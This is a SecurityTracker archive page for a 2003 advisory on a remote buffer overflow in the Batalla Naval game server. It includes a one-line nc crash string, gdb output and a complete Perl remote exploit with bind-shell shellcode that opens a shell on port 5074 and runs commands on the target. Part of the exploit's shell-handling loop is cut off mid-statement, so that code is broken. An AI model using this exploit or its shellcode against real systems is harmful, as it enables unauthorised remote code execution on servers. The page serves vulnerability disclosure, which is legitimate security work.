SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Batalla Naval Vendors:   batnav.sourceforge.net
Batalla Naval Game Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006862
SecurityTracker URL:  http://securitytracker.com/id/1006862
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 28 2003
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.4 and probably prior versions
Description:   A buffer overflow vulnerability was reported in the Batalla Naval game. A remote user can crash the game server or execute arbitrary code.

Priv8security reported that a remote user can trigger a buffer overflow and crash the target server by sending a long string. A demonstration exploit is provided:

(perl -e 'print "A" x 500 . "\xdc\xf8\x04\x08" . "\x0f\xff\xff\xbf" x 20 . "\r\n"';cat) | nc localhost 1995

It is reported that a remote user can send a specially crafted string to execute arbitrary commands on the target server with the privileges of the user that started 'gbnserver'.

A demonstration exploit script is available in the Source Message and at:

http://releases.priv8security.org/priv8gbn.pl

Impact:   A remote user can cause the game server to crash or to execute arbitrary code. The code will run with the privileges of the user that started the game server process.
Solution:   No solution was available at the time of this entry.
Vendor URL:  batnav.sourceforge.net/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  =?iso-8859-1?Q?[Priv8security_Advisory]_Batalla_Naval_remote_overflow?=


Priv8security advisory: 1
-----------------------------------------------------------------------
Product: Gnome Batalla Naval
Version: 1.0.4 (and probably earlier versions)
Vendor: http://batnav.sourceforge.net/
Problem: Remote Buffer overflow
Author: Wsxz (wsxz@priv8security.com)
-----------------------------------------------------------------------

I - About:
----------
From vendor site: Batalla Naval is a networked, multiplayer battleship
game. It has robots, and support for GGZ Gaming Zone and for IPv6.


II - Problem:
-------------
When a user starts gbnserver, remote players can crash the server by
sending a long string.
(perl -e 'print "A" x 500 . "\xdc\xf8\x04\x08" . "\x0f\xff\xff\xbf" x 20
. "\r\n"';cat) | nc localhost 1995

gdb output.

0x405584f7 in poll () from /lib/i686/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbfffff7a in ?? ()

This string will cause gbnserver to crash and making it possible to users
execute commands under uid of user that started the server.


III - Fix:
---------
No fix at the moment.


IV - Credit:
-----------
Bug found by wsxz, any questions mail me at wsxz@priv8security.com
Visit http://www.priv8security.com
Sorry, for my poor english.


V - Exploit (Proof of Concept):
-------------------------------
Exploit url http://releases.priv8security.org/priv8gbn.pl

---cut here----

#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
#    Game url http://batnav.sourceforge.net/
#    Tested against Mandrake 9.0
#
#    [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
#    Connected!
#    [+] Using ret address: 0xbffff3a2
#    [+] Using got address: 0x804f8dc
#    [+] Sending stuff...
#    [+] Done ;pPPp
#    [?] Now lets see if we got a shell...
#    [+] Enjoy your stay on this server =)
#    Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 
i686 unknown unknown GNU/Linux
#    uid=503(wsxz) gid=503(wsxz) groups=503(wsx


use IO::Socket;
if (@ARGV < 1 || @ARGV > 3) {
print "-= Priv8security.com remote gbatnav-1.0.4 server on linux =-\n";
print "Usage: perl $0 <host> <port=1995> <offset=100>\n";
exit;
}
if (@ARGV >= 2) {
$port = $ARGV[1];
$offset = $ARGV[2];
} else {
$port = 1995;
$offset = 0;
}
$shellcode = #bind shellcode port 5074 by s0t4ipv6@shellcode.com.ar
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66".
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1".
"\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04".
"\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66".
"\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6".
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53".
"\x89\xe1\xb0\x0b\xcd\x80";

$ret = 0xbffff3a2; # ret mdk 9.0
$gotaddr = 0x0804f8dc; #objdump -R ./gbnserver | grep strcpy
$new_ret = pack('l', ($ret + $offset));
$new_got = pack('l', ($gotaddr));
$buffer .= "\x90" x (500 - length($shellcode));
$buffer .= $shellcode;
$buffer .= $new_got;
$buffer .= $new_ret x 20;



$f = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>$port)
or die "Cant connect to server or port...\n";

print "Connected!\n";
print "[+] Using ret address: 0x", sprintf('%lx',($ret)), "\n";
print "[+] Using got address: 0x", sprintf('%lx',($gotaddr)), "\n";
print "[+] Sending stuff...\n";
print $f "$buffer\r\n\r\n";
print "[+] Done ;pPPp\n";
print "[?] Now lets see if we got a shell...\n";
close($f);

$handle = IO::Socket::INET->new(Proto=>"tcp",
PeerHost=>$ARGV[0],PeerPort=>5074,Type=>SOCK_STREAM,Reuse=>1)
or die "[-] No luck, try next time ok ...\n";

print "[+] Enjoy your stay on this server =)\n";

$handle->autoflush(1);
print $handle "uname -a;id\n";

    # split the program into two processes, identical twins
    die "cant fork: $!" unless defined($kidpid = fork());

    # the if{} block runs only in the parent process
    if ($kidpid) {
        # copy the socket to standard output
        while (defined ($line =
     }
        kill("TERM", $kidpid);  # send SIGTERM to child
    }
    # the else{} block runs only in the child process
    else {
        # copy standard input to the socket
        while (defined ($line = <STDIN>)) {
            print $handle $line;
        }
    }

---cut here-----


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC